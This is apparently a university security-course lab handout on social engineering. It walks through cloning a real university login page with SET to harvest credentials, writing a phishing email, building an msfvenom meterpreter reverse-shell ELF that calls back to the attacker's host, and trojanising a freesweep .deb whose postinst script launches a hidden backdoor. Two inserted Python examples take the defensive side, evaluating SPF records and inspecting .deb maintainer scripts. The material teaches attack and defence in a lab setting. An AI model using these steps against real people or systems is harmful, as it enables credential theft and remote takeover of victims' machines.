Lab 8 - Social Engineering
"The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly." - https://github.com/trustedsec/social-engineer-toolkit
Note: A key selling point of many SET features is that you can get an attack for testing and demonstration purposes very quickly. Are they believable? Well..... Let's just say additional effort is required to go from script kiddie level to an attack with a real chance of success, and that would be accomplished by other tools (and custom tools), not by using the SET software.
So, with the understanding that SET is more for "fun demos", let's go!
Activities
Part 1 - Credential Harvesting via Site Cloner
Run the Social-Engineer Toolkit
$ sudo setoolkit
[SET ASCII-art banner]
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 8.0.3
Codename: 'Maverick'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
Select the desired mode of operation:
set> 1 # For "Social-Engineering Attacks"
set> 2 # For "Website Attack Vectors"
set:webattack> 3 # For "Credential Harvester Attack"
set:webattack> 2 # For "Site Cloner"
The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
Enter the IP address that you want the stolen credentials to be sent to. The default IP here is probably fine - it's the IP of your Kali box running SET.
set:webattack> aaa.bbb.ccc.ddd
Enter the website that you wish to clone
set:webattack> https://cas.pacific.edu/cas/login
Launch the web browser in Kali and visit your cloned page at http://aaa.bbb.ccc.ddd
Enter a fake username and password, and confirm that you see those credentials in the SET console.
Note that the cloned website redirects to the real login page after swiping the credentials.
The user just assumes they entered the wrong login and tries again. Will they be suspicious? How many times have you entered a wrong password?
Deliverables:
- Upload the XML report that SET produces with all the stolen credentials. You'll need to stop the collection process via CTRL-C.
Tip: The Social Engineering Toolkit is run as the root user so it has the proper network access. However, this means all the files it creates are owned by the root user and saved in the root user's home directory. Use this command to copy the "reports" folder it generates back to your home directory and change the file owner and group to be your username instead of the root user.
$ sudo cp -R /root/.set/reports ~ && sudo chown -R $USER:$USER ~/reports
While this is a fun example, the out-of-the-box SET experience is not particularly convincing. There are a number of issues.
Deliverables:
- Issue 1: Look at the URL of your cloned site: http://aaa.bbb.ccc.ddd. Is that IP address suitable for a real social engineering attack out across the Internet? Try accessing it from your phone if you're unsure. Why doesn't it work? (See: Background reading)
- Issue 1 (continued): How might you solve the IP address issue in the previous question?
- Issue 2: Look at the URL of your cloned site again: http://aaa.bbb.ccc.ddd. An ugly IP address. Even 25% of moms would notice that looks suspicious or unusual. How could you remedy this problem?
- Issue 3: Look at the URL of your cloned site again: http://aaa.bbb.ccc.ddd. HTTP. That's not encrypted. Web browsers are increasingly assertive about labeling such pages as not secure with a variety of warning labels or icons. Maybe 15% of moms would notice that. How could you solve this problem? (And, even better, solve this problem for a cost of $0.00?)
Part 2 - Email Blast
Let's say we have the cloned credential harvesting site, and it's doing a credible job masquerading as a legitimate site (after addressing issues 1-3 above with reasonable solutions). How do we get victims (er, client employees who we have explicit written permission to test) to visit our site? Let's send them an email and bait them to click it.
The Social-Engineer Toolkit has a "Mass Mailer" module where it can send out emails of your own design. Actually using this module (or any other mass mailing program) effectively, however, is a challenge. What you would love to do is generate fake emails coming from ceo@company.com or tech-support@company.com, but you'll quickly run into the same kinds of technological filtering and restrictions used to inhibit spammers.
One such anti-spam technology is Sender Policy Framework (SPF).
Deliverables:
- Describe SPF, in your own words. (1 paragraph)
- Using any number of available websites, generate an SPF rule for the domain company.com, specifying that IP address 123.45.67.89 is allowed to send email for this domain, and that host gmail.com is also allowed to send email for this domain. Note: There are other more-detailed SPF options. I don't care how you set them.
As an example, the SPF rule for pacific.edu is v=spf1 ip4:138.9.110.0/25 ip4:208.117.48.237 ip4:176.31.145.254 include:spf.protection.outlook.com ....(more hosts).... ~all
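To make concrete what a record like the one above does, here is how a receiving mail server evaluates it, as an added example that is not part of the lab: the v=spf1 terms are parsed in order, and the qualifier of the first mechanism that matches the connecting IP address becomes the result (pass, fail, softfail or neutral). The pacific.edu record is the one quoted above with the elided hosts left out. The include_lookup table is a constructed stand-in for the recursive DNS evaluation a real checker performs for include: terms; the a, mx, ptr and exists mechanisms also need DNS and are skipped so the code runs offline.

```python
import ipaddress

# The pacific.edu record quoted in the lab text, with the "(more hosts)" part omitted.
PACIFIC_SPF = ("v=spf1 ip4:138.9.110.0/25 ip4:208.117.48.237 ip4:176.31.145.254 "
               "include:spf.protection.outlook.com ~all")

# Qualifier prefix -> SPF result. A mechanism with no prefix means '+'.
RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record):
    """Split a TXT record into (qualifier, mechanism, value) terms in record order."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    parsed = []
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in RESULT:
            qualifier, term = term[0], term[1:]
        if "=" in term:  # modifiers such as redirect= or exp= are not mechanisms
            continue
        name, _, value = term.partition(":")
        parsed.append((qualifier, name.lower(), value))
    return parsed


def check_spf(record, sender_ip, include_lookup=None):
    """Return the SPF result for a message whose TCP connection came from sender_ip.

    include_lookup (constructed stand-in for DNS): maps an included domain to the
    result its own record would give for this IP; include: matches only on 'pass'.
    """
    ip = ipaddress.ip_address(sender_ip)
    include_lookup = include_lookup or {}
    for qualifier, name, value in parse_spf(record):
        matched = False
        if name in ("ip4", "ip6"):
            # An IPv4 sender is never inside an IPv6 network and vice versa.
            matched = ip in ipaddress.ip_network(value, strict=False)
        elif name == "include":
            matched = include_lookup.get(value) == "pass"
        elif name == "all":
            matched = True
        # a / mx / ptr / exists would need DNS here; left unmatched offline.
        if matched:
            return RESULT[qualifier]
    return "neutral"  # ran off the end of the record without an 'all' term


if __name__ == "__main__":
    # Constructed sender addresses: one inside the /25, one outside, one via the include.
    for ip in ("138.9.110.17", "138.9.110.200", "203.0.113.5"):
        print(ip, "->", check_spf(PACIFIC_SPF, ip))
    print("203.0.113.5 via outlook include ->",
          check_spf(PACIFIC_SPF, "203.0.113.5", {"spf.protection.outlook.com": "pass"}))
```

Note what is checked: the IP address of the server that actually delivered the message, not anything in the From: header. That is why a message forged as ceo@company.com but handed off from an unrelated host ends the record at ~all (softfail) or -all (fail), and the receiver can weight it accordingly.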
Another such anti-spam technology is DomainKeys Identified Mail (DKIM).
Deliverables:
- Describe DKIM, in your own words. (1 paragraph)
Finally, Domain-based Message Authentication, Reporting, and Conformance (DMARC) is a third anti-spam technology closely related to the first two.
Deliverables:
- Describe DMARC, in your own words. (1 paragraph)
Note that none of these systems are guarantees. The receiver of an email could choose to disregard these systems and deliver a fraudulent message anyway. Or, more likely, the receiver uses information from these systems as data points in a larger anti-spam system that examines the content of the message, the reputation of the server sending the email, the user history in flagging previous messages as spam, and proprietary trade secrets built on decades of experience, when deciding whether to deliver the message to a user inbox. Even new legitimate senders have significant challenges in reliably delivering emails to @gmail.com, @outlook.com, and other large mail services.
Because of these challenges, you'll often see phishing attacks coming from ceo@fakecompany.com, or ceo-fakecompany@gmail.com, or ceo@company.fake.com, as those are more likely to be delivered. Of course, if you already have some access to the corporate network after earlier pen testing activities, you could send emails out using the legitimate corporate email server. But that's a chicken and egg problem - oftentimes you're using social engineering attacks to gain initial access to the network.
Deliverables:
- Using your own personal email, create a high quality phishing email that would plausibly induce a "typical university student" to click on a link and take some action. Send it to yourself to ensure it's correctly formatted. Then, save the email as a .eml or .html file and attach it here. In gmail, the "download message" feature under the ". . ." icon will do this. Other mail clients have an export or save-as feature.
Part 3 - Payloads via msfvenom
Metasploit includes a tool - msfvenom - that can package Metasploit exploits into stand-alone executables that a user can be tricked into running via a social engineering attack.
To see a list of all available payloads, do:
$ msfvenom --list payloads
It's a long list, and the same list of available payloads that Metasploit normally has available to run after an exploit. Just, this time no exploit is needed, since we're using social engineering to trick the user into running the payload.
To see a list of available output formats, CPU architectures, and platforms, do:
$ msfvenom --list formats
$ msfvenom --list archs
$ msfvenom --list platforms
Make an executable that is runnable on our Metasploitable2 VM, a Linux host. That would be the .elf file type. (Windows would be .exe). Pick a payload from the list that works on Linux, and ask msfvenom to package it for you and save it to /tmp/LegitProgram. This payload is hardwired to connect back to the LHOST IP address, which should be Kali's IP:
$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
--arch x86 \
--format elf \
--platform linux \
--out /tmp/LegitProgram \
LHOST=aaa.bbb.ccc.ddd \
LPORT=5678
Tip 1: For clarity, this long command was split into multiple lines with the Bash "line continuation" character \. Keep that character in if you enter the multi-line command, or omit it if you enter the command as a single line.
Tip 2: Did your console fill up with "gibberish" when you ran this? Then you didn't correctly direct the output to the file /tmp/LegitProgram (with --out, or by redirecting with >), and thus msfvenom wrote the executable file to standard output instead.
Change to the /tmp directory, and start a simple webserver in Kali to host this "LegitProgram" binary. We're using this as a way to get the binary on the target machine since we're in control of both sides, but in reality this would be accomplished through some social engineering attack.
$ cd /tmp
$ python2 -m SimpleHTTPServer 8888 # Built-in webserver in Python 2
# python3 -m http.server 8888 # Alternate command: Built-in webserver in Python 3
Over on your Metasploitable2 VM, download the file from the webserver running in the Kali VM:
$ wget aaa.bbb.ccc.ddd:8888/LegitProgram
Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named LegitProgram.1, LegitProgram.2, etc., as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.
At this point, you can CTRL-C the webserver; we don't need it any more.
Run metasploit
$ sudo service postgresql start
$ msfconsole
Use the generic payload handler that provides Metasploit features to exploits run outside of the framework. Configure it for the payload you just downloaded on the target VM, as it needs to know
- What payload is incoming
- What IP the payload is connecting to, and
- What port the payload is connecting to.
msf6> use exploit/multi/handler
msf6> set PAYLOAD linux/x86/meterpreter_reverse_tcp
msf6> set LHOST aaa.bbb.ccc.ddd
msf6> set LPORT 5678
msf6> set ExitOnSession false
Run this service in the background as a job.
msf6> exploit -j
Now, over in the Metasploitable2 VM, run the payload.
$ chmod +x LegitProgram # Needs to be marked as executable
$ ./LegitProgram
Back in Kali, you should see a notice that a new session was opened.
[*] Meterpreter session 1 opened (172.16.196.2:5678 -> 172.16.196.4:33423) at 2021-02-07 00:20:41 -0800
msf6> sessions --list
msf6> sessions -i X # where X = number of Meterpreter session
Deliverables:
- Submit a screenshot of your Kali msfconsole showing an active meterpreter session
- Submit a screenshot of your Kali meterpreter showing the output of "sysinfo"
- Submit a screenshot of your Metasploitable2 VM console showing the "LegitProgram" running.
In Kali, you can quit the Meterpreter session with the quit command. In addition, you can view the listening handler with jobs and then kill that listener with kill # (where # is the job ID number).
Part 4 - Payload Obfuscation
Rather than coax the user into running a program that is exclusively a back door (which might make them suspicious), what if the backdoor is bundled with some legitimate program? Let's build a Linux installer package (.deb file) for the minesweeper game "freesweep", but include an extra surprise in the bundle.
Based off of this tutorial, but with bugfixes. :) https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/
First, on Kali, download the legitimate .deb file from the package manager. Since we're going to run this on the OLD Metasploitable2 VM (32-bit), let's just grab the correct binary out of the Ubuntu archives. That way, the dynamic library dependencies will work out OK.
$ mkdir -p /tmp/working
$ cd /tmp/working
$ wget http://old-releases.ubuntu.com/ubuntu/pool/universe/f/freesweep/freesweep_0.88-4.3_i386.deb
Second, extract the files into that working directory
$ dpkg -x freesweep_0.88-4.3_i386.deb package
Third, add a DEBIAN directory to contain the "extra surprise" we are including in this package
$ mkdir /tmp/working/package/DEBIAN
In the DEBIAN directory, create a new file called control with the following contents:
$ nano /tmp/working/package/DEBIAN/control
Package: freesweep
Version: 0.88-4.3
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
In the DEBIAN directory, create a post-installation script called postinst with the following commands that
- Change the permissions of the innocently-named "freesweep_scores" to include the execute flag
- Run the innocently-named "freesweep_scores", and
- Run the legitimate freesweep program
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep
Make this script executable
$ chmod +x /tmp/working/package/DEBIAN/postinst
Now, generate our backdoor program "freesweep_scores":
$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
--arch x86 \
--format elf \
--platform linux \
LHOST=aaa.bbb.ccc.ddd \
LPORT=5678 \
--out /tmp/working/package/usr/games/freesweep_scores
Finally, build the new .deb file with the backdoor program:
$ cd /tmp/working/package/DEBIAN
$ dpkg-deb -Zgzip --build /tmp/working/package
# -Zgzip is needed because Metasploitable2 OS is much older than Kali's, and
# package manager doesn't know how to uncompress newer .deb files
Rename the output back into the original freesweep.deb file name (no one suspects a thing!), and move it to /tmp
$ mv /tmp/working/package.deb /tmp/freesweep.deb
$ cd /tmp
As you did in the previous section: Run the web server and copy the new freesweep.deb to your Metasploitable2 VM with wget.
Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named freesweep.deb.1, freesweep.deb.2, etc., as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.
As you did in the previous section: Run Metasploit and launch the exploit/multi/handler with the correct options to listen for an incoming connection. Or, if msfconsole is still active, the handler may be still running.
On the Metasploitable2 VM, install this super fun game your friend sent you!
$ sudo dpkg -i freesweep.deb
# Oh look, the game started automatically!
# Let's play, this looks fun!
On Kali, view the active sessions
msf6> sessions --list
msf6> sessions -i x
meterpreter> sysinfo
Troubleshooting:
Did something go wrong in your steps? To clear out metasploitable2 and start again:
$ sudo apt-get remove freesweep
$ rm freesweep.deb
# And download a fixed .deb file and try installing it again
You can verify that your copy of freesweep.deb contains your backdoor program with dpkg -c freesweep.deb.
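dpkg -c only lists the files in the package's data archive; it does not show the maintainer scripts, which is where this package does its real work. As an added example (not from the lab or the Offensive Security tutorial it is based on), the following code pulls a .deb apart offline the way a reviewer would before installing an untrusted package: it parses the outer ar container, reads the control.tar.* maintainer scripts that dpkg runs as root, finds every ELF binary in data.tar.*, and reports where a maintainer script changes permissions or references a shipped binary. build_sample_deb() constructs a stand-in for the repackaged freesweep.deb using the lab's file layout and postinst; the "binaries" are just ELF magic bytes plus padding, not real programs.

```python
import hashlib
import io
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}


def _ar_member(name, data):
    """One ar member: 60-byte header (name, mtime, uid, gid, mode, size, magic), data, pad to even."""
    header = (f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}").encode() + b"`\n"
    return header + data + (b"\n" if len(data) % 2 else b"")


def _tar_gz(files):
    """Build a gzip'd tar in memory from {path: (mode, bytes)}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, (mode, content) in files.items():
            info = tarfile.TarInfo(name=path)
            info.size, info.mode = len(content), mode
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_deb():
    """Constructed stand-in for the lab's repackaged freesweep.deb (placeholder ELF bytes)."""
    control = _tar_gz({
        "./control": (0o644, b"Package: freesweep\nVersion: 0.88-4.3\nArchitecture: i386\n"),
        "./postinst": (0o755, b"#!/bin/sh\nsudo chmod 2755 /usr/games/freesweep_scores && "
                              b"/usr/games/freesweep_scores & /usr/games/freesweep\n"),
    })
    data = _tar_gz({
        "./usr/games/freesweep": (0o755, b"\x7fELF" + b"\x00" * 60),
        "./usr/games/freesweep_scores": (0o644, b"\x7fELF" + b"\x00" * 60),
        "./usr/share/doc/freesweep/copyright": (0o644, b"GPL-2\n"),
    })
    return (AR_MAGIC + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control) + _ar_member("data.tar.gz", data))


def read_deb(blob):
    """Parse the outer ar container of a .deb into {member_name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members, pos = {}, len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[:16].decode().strip().rstrip("/")  # some ar writers end names with '/'
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # members are 2-byte aligned
    return members


def _open_tar(members, prefix):
    """Open control.tar.* or data.tar.* whatever compression dpkg-deb used (-Zgzip here)."""
    for name, data in members.items():
        if name.startswith(prefix):
            return tarfile.open(fileobj=io.BytesIO(data), mode="r:*")
    raise ValueError(f"no {prefix} member")


def inspect_deb(blob):
    """Checksum, maintainer scripts (run as root by dpkg) and shipped ELF binaries of a .deb."""
    members = read_deb(blob)
    report = {"md5": hashlib.md5(blob).hexdigest(),
              "maintainer_scripts": {}, "elf_files": [], "findings": []}
    with _open_tar(members, "control.tar") as control:
        for info in control.getmembers():
            script = info.name.lstrip("./")
            if info.isfile() and script in MAINTAINER_SCRIPTS:
                report["maintainer_scripts"][script] = control.extractfile(info).read().decode()
    with _open_tar(members, "data.tar") as data:
        for info in data.getmembers():
            if info.isfile() and data.extractfile(info).read(4) == b"\x7fELF":
                report["elf_files"].append(info.name.lstrip("."))
    for script, body in report["maintainer_scripts"].items():
        if "chmod" in body:
            report["findings"].append(f"{script} changes file permissions at install time")
        for path in report["elf_files"]:
            if path in body:
                report["findings"].append(f"{script} references shipped binary {path}")
    return report


if __name__ == "__main__":
    result = inspect_deb(build_sample_deb())
    print("md5:", result["md5"])
    for finding in result["findings"]:
        print("finding:", finding)
```

On a real package, pass the bytes of the downloaded file to inspect_deb() and compare the md5 against the one published by the repository; a package whose postinst chmods and launches a binary that the upstream package never shipped is exactly the kind of difference the comparison of the two checksums in the deliverables below is meant to surface.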
Deliverables:
- Submit a screenshot of Metasploitable2 showing the game running
- Submit a screenshot of Kali showing the active meterpreter session
- What is the md5 checksum of the original freesweep .deb file downloaded from the repository? Use the md5sum command.
- What is the md5 checksum of the modified freesweep.deb file that also includes the backdoor program "freesweep_scores"? Use the md5sum command.